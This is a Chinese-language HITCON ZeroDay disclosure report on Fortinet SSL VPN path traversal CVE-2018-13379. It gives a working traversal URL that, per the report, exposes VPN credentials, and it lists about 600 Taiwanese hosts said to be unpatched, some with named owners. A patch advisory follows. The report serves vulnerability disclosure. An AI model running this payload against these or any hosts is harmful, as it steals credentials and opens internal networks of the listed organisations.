大量單位Fortinet FortiWeb sslvpn_websession 路徑遍歷漏洞CVE-2018-13379 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2022-00515
  •  發信 Vendor: 大量單位
  • Title: 大量單位Fortinet FortiWeb sslvpn_websession 路徑遍歷漏洞CVE-2018-13379
  • Introduction: sslvpn_websession 路徑遍歷漏洞CVE-2018-13379

處理狀態

目前狀態

公開
Last Update : 2022/09/21
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2022/07/21 12:10:44 : 新提交 (由 好男人 更新此狀態)
  • 2022/07/23 23:59:07 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/07/24 11:58:50 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/07/24 11:58:50 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/09/20 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
  • 2022/09/21 14:55:32 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)

詳細資料

  • ZDID:ZD-2022-00515
  • 通報者:qekuxpre (好男人)
  • 風險:嚴重
  • 類型:本地檔案引入 (Local File Inclusion, LFI)

參考資料

攻擊者可經由該漏洞取得後端系統檔案及網站程式原始碼等敏感資料。

漏洞說明: OWASP - Testing for Local File Inclusion
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

Wikepedia 漏洞說明:
https://en.wikipedia.org/wiki/File_inclusion_vulnerability

OWASP Top 10 2007 - Malicious File Execution
https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://ww4.0173.tw:10443 173 叫車
https://ww3.0173.tw:10443 173 叫車
https://220.135.182.131:10443 labeljet
https://210.63.220.81:10443/ 璦司柏電子股份有限公司
https://60.199.198.31:10443/ 城邦媒體控股集團
https://60.250.195.175:10443 傳典公司
https://eduinfo.mtaxi.com.tw:10443 大都會計程車
https://edu.mtaxi.com.tw:10443 大都會計程車
https://discussinfo.mtaxi.com.tw:10443 大都會計程車
https://211.22.206.181:10443/ 頂元科技
https://140.118.206.93:10443/ 國立臺灣科技大學電機工程系
https://125.227.8.97:10443/ 翰陽電子實業有限公司
https://211.20.120.57:10443 合華科技
https://122.147.151.196:10443/ 合正科技
https://211.21.140.34:8888/ 甲山林集團
https://60.248.240.1:10443/ 媽咪樂
https://114.34.69.61:10443/ 社團法人新北市土木技師公會
https://203.67.136.22:10443/ 臺灣金山電子工業股份有限公司
https://220.130.103.16:10443/ 維立電機股份有限公司
https://211.75.186.47:10443 小婷電腦有限公司
https://ncssl.e-synergy.com.tw 新能循環科技
https://60.249.149.73:10443/ 亞豪貿易股份有限公司
https://118.163.218.49 乂迪生科技
https://esa.esine.com.tw:10443 裕信汽車
https://210.242.90.199:10443 裕信汽車
https://59.124.126.10:10443 悅誠興業股份有限公司
https://202.39.234.199:10443 照護線上
https://210.201.90.63:10443/ 正達國際光電
https://60.250.241.225:10443/
--------------------------------------------以下為未知單位----------------------------------------------------------
https://61-31-168-242.static.tfn.net.tw:10443
https://61.70.109.219:10443
https://61.66.219.254:8443
https://61.66.219.216:8443
https://61.66.219.212:8443
https://61.66.219.167:8443
https://61.63.227.65:10443
https://61.58.47.99:10443
https://61.56.209.158:10443
https://61.31.169.142:10443
https://61.31.168.242:10443
https://61.30.148.93:10443
https://61.222.86.13:10443
https://61.222.59.158:8443
https://61.222.54.181
https://61.222.51.233:10443
https://61.222.236.229:8080
https://61.222.131.43:10443
https://61.222.117.175
https://61.222.103.109:10443
https://61.221.92.110:10443
https://61.221.92.108:10443
https://61.221.92.104:10443
https://61.221.92.101:10443
https://61.221.81.139:10443
https://61.221.81.139:10443
https://61.221.60.32:10443
https://61.221.58.85:10443
https://61.221.57.83
https://61.221.34.98:10443
https://61.221.26.181:10443
https://61.221.228.217:10443
https://61.221.215.212:10443
https://61.221.189.199:10443
https://61.221.189.193:10443
https://61.220.72.98:9443
https://61.220.55.193:4443
https://61.220.52.70:10443
https://61.220.51.40:10443
https://61.220.37.187:10443
https://61.220.26.220:4443
https://61.220.229.122:4433
https://61.220.206.109:10443
https://61.220.205.28:10443
https://61.220.204.53:8443
https://61.220.204.50:8443
https://61.220.203.103:10443
https://61.220.20.52
https://61.220.183.136:4433
https://61.220.142.224:10443
https://61.220.133.240:10443
https://61.220.121.178:10443
https://61.220.103.137:10443
https://61.219.70.200:10443
https://61.219.46.115
https://61.219.43.157:10443
https://61.219.249.252:10443
https://61.219.219.136:10443
https://61.219.18.210:10443
https://61.219.164.79:10443
https://61.219.134.187:10443
https://61.218.87.226:10443
https://61.218.87.204:10443
https://61.218.61.43:10443
https://61.218.253.103:10443
https://61.218.241.13:10443
https://61.218.208.242:10443
https://61.218.174.79:10443
https://61.218.174.250
https://61.218.174.247
https://61.218.133.174:10443
https://61.218.115.82
https://61.218.115.34
https://61.216.96.241
https://61.216.80.199:10443
https://61.216.71.225
https://61.216.66.55:3443
https://61.216.36.146:10443
https://61.216.35.103:1443
https://61.216.24.96:1234
https://61.216.24.169:10443
https://61.216.189.55:10443
https://61.216.180.43:10443
https://61.216.179.27:10443
https://61.216.159.100
https://61.216.152.186:10443
https://61.216.129.139
https://61.216.119.56:10443
https://61.216.115.247:8443
https://61.216.102.29:10443
https://60.251.70.152:10443
https://60.251.64.243:10443
https://60.251.63.121:10443
https://60.251.62.191:10443
https://60.251.60.80:10443
https://60.251.52.212:10443
https://60.251.47.97:10443
https://60.251.42.81
https://60.251.42.56
https://60.251.42.55
https://60.251.3.65:10443
https://60.251.236.24:10443
https://60.251.229.241:10443
https://60.251.224.57:10443
https://60.251.223.92:10443
https://60.251.201.40
https://60.251.196.75:888
https://60.251.196.74:888
https://60.251.196.217:10443
https://60.251.192.68:10443
https://60.251.189.91
https://60.251.188.145
https://60.251.156.128:10443
https://60.251.154.79:10443
https://60.251.145.100:10443
https://60.251.144.250:10443
https://60.251.143.4:10443
https://60.251.124.211:12345
https://60.251.110.32
https://60.250.63.109:4433
https://60.250.63.109:4433
https://60.250.56.60
https://60.250.53.49:10443
https://60.250.49.98
https://60.250.37.216:10443
https://60.250.33.235:10443
https://60.250.246.200
https://60.250.245.102:10443
https://60.250.241.228:10443
https://60.250.241.227:10443
https://60.250.241.226:10443
https://60.250.241.223:10443
https://60.250.238.65:10443
https://60.250.226.128:10443
https://60.250.206.245:10443
https://60.250.203.218:3443
https://60.250.203.217:3443
https://60.250.201.23:9443
https://60.250.200.128
https://60.250.197.199:10443
https://60.250.197.145:10443
https://60.250.195.180:10443
https://60.250.195.179:10443
https://60.250.195.178:10443
https://60.250.195.176:10443
https://60.250.161.163:8443
https://60.250.157.67:10443
https://60.250.154.133
https://60.250.154.133
https://60.250.144.144:10443
https://60.250.143.63:10443
https://60.250.136.163
https://60.250.128.229
https://60.250.126.211:60443
https://60.250.124.158:60443
https://60.250.111.208:10443
https://60.250.106.1:10443
https://60.249.88.91:10443
https://60.249.88.40:10443
https://60.249.79.145:4433
https://60.249.27.2:10443
https://60.249.27.2:10443
https://60.249.247.114:10443
https://60.249.241.91:10443
https://60.249.236.135:10443
https://60.249.221.205:4443
https://60.249.212.199
https://60.249.210.55:10443
https://60.249.2.3:10443
https://60.249.2.2:10443
https://60.249.192.88:10443
https://60.249.181.125
https://60.249.178.156:10443
https://60.249.15.64:10443
https://60.249.138.155:10443
https://60.249.13.47:10443
https://60.248.95.232:10443
https://60.248.91.41:10443
https://60.248.86.6:10443
https://60.248.40.9:10443
https://60.248.35.38:10443
https://60.248.255.31:10443
https://60.248.255.181:10443
https://60.248.255.154:10443
https://60.248.251.119:10443
https://60.248.25.106:10443
https://60.248.25.10:10443
https://60.248.176.223:10443
https://60.248.165.150
https://60.248.157.30:10443
https://60.248.138.16:10443
https://60.248.111.38:10443
https://60.248.108.108:10443
https://59.127.79.241:10443
https://59.127.62.110:10443
https://59.127.61.174:10443
https://59.127.206.118:10443
https://59.127.17.217:10443
https://59.127.127.11:10443
https://59.127.113.39:10443
https://59.126.32.48:10443
https://59.126.195.132:10443
https://59.126.181.167:10443
https://59.126.168.188:10443
https://59.126.103.94:10443
https://59.125.8.69:10443
https://59.125.247.79:10443
https://59.125.241.250:10443
https://59.125.241.250:10443
https://59.125.236.151:10443
https://59.125.222.10
https://59.125.222.10
https://59.125.183.82:10443
https://59.125.181.114
https://59.125.155.91:50000
https://59.125.136.71:10443
https://59.125.135.109:50000
https://59.125.125.181:4443
https://59.125.124.199:10443
https://59.125.124.106:10443
https://59.125.119.80:10443
https://59.125.116.216:10443
https://59.124.95.70:10443
https://59.124.71.133:10443
https://59.124.70.40:10443
https://59.124.69.19:4433
https://59.124.31.211:10443
https://59.124.30.33:10443
https://59.124.225.64:10443
https://59.124.22.169:10443
https://59.124.219.220:10443
https://59.124.207.199:10443
https://59.124.200.132:10443
https://59.124.194.27
https://59.124.152.210:10443
https://59.124.142.98:10443
https://59.124.137.36:10443
https://59.124.13.155:10443
https://59.124.129.189
https://59.124.102.162:10443
https://59.120.94.181:10443
https://59.120.90.85:10443
https://59.120.63.50:10443
https://59.120.56.130:8443
https://59.120.53.119:10443
https://59.120.35.72:10443
https://59.120.35.242:10443
https://59.120.3.205:10443
https://59.120.242.201:10443
https://59.120.226.156:10443
https://59.120.225.74:10443
https://59.120.199.216:10443
https://59.120.195.137:10443
https://59.120.195.133:10443
https://59.120.19.12:4444
https://59.120.189.208:10443
https://59.120.188.76:10443
https://59.120.184.232:10443
https://59.120.184.230:10443
https://59.120.18.235:4444
https://59.120.156.54:10443
https://59.120.152.52:10443
https://59.120.151.28:4433
https://59.120.147.67:10443
https://59.120.120.4:10443
https://59.120.119.252:10443
https://59.120.114.14:10443
https://59.120.11.16
https://59.120.102.126:1443
https://49.213.193.196:10443
https://49.213.186.133:10443
https://36.231.115.167:10443
https://220-130-42-140.hinet-ip.hinet.net:10443
https://220.135.97.170:10443
https://220.135.70.195:10443
https://220.135.68.92
https://220.135.57.150:10443
https://220.135.205.87
https://220.135.161.163:444
https://220.135.160.91:10443
https://220.135.160.91:10443
https://220.135.15.250:9443
https://220.135.145.253:10443
https://220.135.110.175:10443
https://220.134.53.231:10443
https://220.134.17.199:10443
https://220.134.13.244:10443
https://220.133.98.171:10443
https://220.133.46.124:10443
https://220.133.156.76:10443
https://220.132.73.76:10443
https://220.132.54.132:10443
https://220.132.51.250:4433
https://220.132.135.247:10443
https://220.132.13.207:10443
https://220.130.87.181:50000
https://220.130.84.108:10443
https://220.130.45.248
https://220.130.37.128:10443
https://220.130.239.190:10443
https://220.130.201.52:10443
https://220.130.195.234:10443
https://220.130.187.1:10443
https://220.130.181.11:10443
https://220.130.160.139:10443
https://220.130.141.107:10443
https://220.130.11.81:10443
https://220.128.98.24:10443
https://220.128.98.209:10443
https://220.128.234.48:10443
https://220.128.199.31:10443
https://220.128.156.241:10443
https://220.128.128.43:10443
https://220.128.124.63:10443
https://220.128.124.63:10443
https://220.128.120.8:888
https://220.128.117.146:10443
https://220.128.115.106:7443
https://220.128.113.73
https://220.128.106.53
https://219.85.16.50
https://219.80.92.56
https://219.80.66.14
https://219.80.251.160:10443
https://218-161-53-13.hinet-ip.hinet.net:10443
https://218.32.94.77:10443
https://218.32.63.116:10443
https://218.32.47.36:10443
https://218.32.46.96:10443
https://218.32.46.44:10443
https://218.32.45.100:10443
https://218.32.249.160:10443
https://218.32.246.108:4433
https://218.161.10.15:10443
https://211-75-2-34.hinet-ip.hinet.net:10443
https://211-20-146-40.hinet-ip.hinet.net:10443
https://211.75.244.211:4433
https://211.75.236.236
https://211.75.233.187:4433
https://211.75.233.115:10443
https://211.75.222.145:10443
https://211.75.221.195:10443
https://211.75.214.51:10443
https://211.75.206.26:3306
https://211.75.2.34:10443
https://211.75.186.136:10443
https://211.75.177.47:10443
https://211.75.165.215:10443
https://211.75.164.244:10443
https://211.75.161.242:10443
https://211.75.159.121:10443
https://211.75.157.109:10443
https://211.75.118.194:10443
https://211.75.118.193:10443
https://211.75.118.106
https://211.72.91.224:10443
https://211.72.73.46:8888
https://211.72.231.95
https://211.72.212.221:5800
https://211.72.199.55:10443
https://211.72.182.181
https://211.72.124.89:449
https://211.72.124.87:449
https://211.72.124.85:449
https://211.72.100.121:10443
https://211.23.44.195:10443
https://211.23.42.222:10443
https://211.23.39.18:10443
https://211.23.161.91:4443
https://211.23.156.157:10443
https://211.23.148.102:10443
https://211.23.139.106:10443
https://211.23.139.105:10443
https://211.23.138.230:10443
https://211.23.128.19:10443
https://211.23.123.98:10443
https://211.22.53.69
https://211.22.28.230:10443
https://211.22.25.203
https://211.22.221.4:10443
https://211.22.219.31:10443
https://211.22.184.46:10443
https://211.22.151.96:1443
https://211.22.129.97:10443
https://211.22.111.1:10443
https://211.21.228.123:10443
https://211.21.221.79
https://211.21.200.187:10443
https://211.21.19.91:10443
https://211.21.108.246:10443
https://211.21.104.194:10443
https://211.20.8.91:10443
https://211.20.52.31:10443
https://211.20.50.85:10443
https://211.20.234.13:10443
https://211.20.205.243
https://211.20.201.20:10443
https://211.20.200.85:10443
https://211.20.17.144
https://211.20.169.121:10443
https://211.20.146.219:10443
https://211.20.145.211
https://211.20.144.192:10443
https://211.20.144.191:10443
https://211.20.133.100:10443
https://211.20.115.16:3443
https://210.71.175.28:10443
https://210.68.245.93:10443
https://210.68.218.25:10443
https://210.68.16.181:10443
https://210.66.16.122:10443
https://210.64.36.104
https://210.64.189.167:10443
https://210.64.189.126:10443
https://210.63.220.169:4433
https://210.63.216.89:9443
https://210.63.216.82:10443
https://210.63.216.81:10443
https://210.63.203.204:10443
https://210.61.96.247:10443
https://210.61.29.139:10443
https://210.61.29.139:10443
https://210.61.246.25
https://210.61.150.61:10443
https://210.61.135.157:10443
https://210.59.240.91:10443
https://210.59.226.42:10443
https://210.59.12.253:10443
https://210.244.2.73:10443
https://210.242.161.241
https://210.242.156.91:4443
https://210.240.168.134:1234
https://210.209.184.195:10443
https://210.208.104.194 
https://210.208.104.170
https://203.74.156.80:4433
https://203.74.120.241:10443
https://203.73.62.152:10443
https://203.73.216.146:10443
https://203.73.157.230:10443
https://203.70.224.170:10443
https://203.70.214.227:10443
https://203.69.37.163:10443
https://203.69.238.43:10443
https://203.69.238.32:6699
https://203.69.234.112
https://203.69.17.33:10443
https://203.68.12.69:10443
https://203.67.132.5:10443
https://203.204.215.138:10443
https://202.39.78.37
https://202.39.77.14:10443
https://202.39.65.142:10443
https://202.39.38.46:10443
https://202.39.28.24:10443
https://202.39.27.198
https://202.39.27.197
https://202.39.27.196
https://202.39.27.195
https://202.39.27.194
https://202.39.27.193
https://202.39.231.93
https://202.39.210.217:10443
https://202.153.194.158
https://175.98.117.67:10443
https://175.98.117.66:10443
https://163.24.112.125:10443
https://163.17.246.254:10443
https://140.121.81.181
https://140.121.81.181
https://1-34-101-137.hinet-ip.hinet.net:10443
https://125-227-137-226.hinet-ip.hinet.net:10443
https://125.62.229.254:10443
https://125.229.75.87:10443
https://125.229.64.72:10443
https://125.229.112.8:8443
https://125.229.1.105:10443
https://125.228.95.206:10443
https://125.228.77.113:10443
https://125.228.223.132:10443
https://125.228.223.132:10443
https://125.228.18.107
https://125.228.109.245
https://125.227.65.91:10443
https://125.227.48.76:6443
https://125.227.48.75:6443
https://125.227.48.73:6443
https://125.227.40.169:4433
https://125.227.40.133
https://125.227.35.229:10443
https://125.227.251.80:10443
https://125.227.249.50
https://125.227.249.33:10443
https://125.227.247.43:10443
https://125.227.227.134:10443
https://125.227.218.181:10443
https://125.227.214.127:10443
https://125.227.203.73:10443
https://125.227.202.118:10443
https://125.227.201.137
https://125.227.181.151:10443
https://125.227.175.123:10443
https://125.227.17.161:8888
https://125.227.17.133:10443
https://125.227.161.205:10443
https://125.227.140.162:10443
https://125.227.137.226:10443
https://125.227.120.120:10443
https://125.227.115.3
https://125.227.11.238:10443
https://125.227.11.159:10443
https://123.51.250.40
https://123.51.133.103:8111
https://123.241.20.247:10443
https://123.205.165.150:10443
https://123.192.167.162:10443
https://123.110.238.61:80
https://122.147.49.43
https://122.117.98.147:10443
https://122.117.54.204:10443
https://122.117.206.105:10443
https://122.117.149.27:10443
https://122.116.66.219:10443
https://122.116.40.166:10443
https://122.116.30.79:10443
https://122.116.254.234:4433
https://122.116.226.84
https://122.116.216.166:8443
https://122.116.18.118:10443
https://122.116.172.125
https://122.116.163.78:10443
https://122.116.154.238:10443
https://122.116.12.108:10443
https://122.116.11.59:10443
https://118-163-20-115.hinet-ip.hinet.net:10443
https://118.233.64.112:10443
https://118.163.98.252
https://118.163.98.251
https://118.163.98.251
https://118.163.98.250
https://118.163.98.249
https://118.163.98.247
https://118.163.98.247
https://118.163.94.172:10443
https://118.163.9.5:10443
https://118.163.9.1:10443
https://118.163.86.13:10443
https://118.163.84.37:10443
https://118.163.8.201:10443
https://118.163.64.19:10443
https://118.163.48.38:8080
https://118.163.46.187:10443
https://118.163.4.43:10443
https://118.163.253.248:10443
https://118.163.219.16
https://118.163.205.25:10443
https://118.163.20.115:10443
https://118.163.176.181:10443
https://118.163.174.150:10443
https://118.163.163.67:10443
https://118.163.157.175:10443
https://118.163.155.185:10443
https://118.163.140.123:10443
https://118.163.139.55:10443
https://118.163.135.43:5443
https://118.163.127.133
https://118.163.123.151:10443
https://117.56.223.109:60443
https://117.56.214.195:10443
https://114-34-168-109.hinet-ip.hinet.net:10443
https://114.35.75.46:10443
https://114.35.107.32:10443
https://114.35.102.160:10443
https://114.34.72.87:10443
https://114.34.72.48:10443
https://114.34.52.136:10443
https://114.34.22.240:10443
https://114.34.215.153:60443
https://114.34.176.86:10443
https://114.34.168.250:10443
https://114.34.136.232:10443
https://114.34.1.111:10443
https://114.33.67.126:10443
https://114.33.42.156:10443
https://114.33.42.126:10443
https://114.33.37.112:10443
https://114.33.179.86
https://114.33.136.140:10443
https://114.33.13.147:10443
https://114.32.63.110:10443
https://114.32.230.229:10443
https://114.32.223.95:10443
https://114.32.22.51:10443
https://114.32.212.178:10443
https://114.32.183.90:10443
https://114.32.158.137:10443
https://114.32.150.33:10443
https://114.32.142.190:10443
https://114.32.121.114:10443
https://114.32.103.143
https://113.61.204.201:10443
https://113.196.50.88:10443
https://113.196.190.41
https://112.104.189.23:10443
https://111.249.58.172
https://106.104.161.52:10443
https://106.104.161.183:10443
https://1.34.206.18:10443
https://1.34.204.183:10443
https://1.34.192.171:8443
https://1.34.191.212
https://1.34.183.214:80
https://1.34.182.112:10443
https://1.34.157.30:12345
https://1.34.148.49
https://1.34.101.137:10443

敘述

經搜尋台灣地區有將近9672個Fortinet FortiWeb sslvpn系統,利用CVE-2018-13379檢測,發現有645筆左右存有漏洞系統,經過2年還有將近6%的系統尚未修補此漏洞,此漏洞可利用以下POC驗證,存有漏洞系統將可直接查看VPN系統使用者帳號及密碼,獲取的帳號密碼即可登錄後台,並可利用VPN直接探索內網。

目標網址/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

圖片

修補建議

Fortinet PSIRT 建議FG-IR-18-384 [4][5]提供了處理此漏洞的相關資訊,並就不同版本的軟件提供適合的保安更新,用戶應盡快升級到相應的版本以修復此漏洞。

參考連結:

[1] https://twitter.com/Bank_Security/status/1329426020647243778

[2] https://www.bleepingcomputer.com/news/security/hacker-posts-exploits-for-over-49-000-vulnerable-fortinet-vpns/

[3] https://us-cert.cisa.gov/ncas/current-activity/2020/11/27/fortinet-fortios-system-file-leak

[4] https://www.fortiguard.com/psirt/FG-IR-18-384

[5] /my_url/en/alert/19100802

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;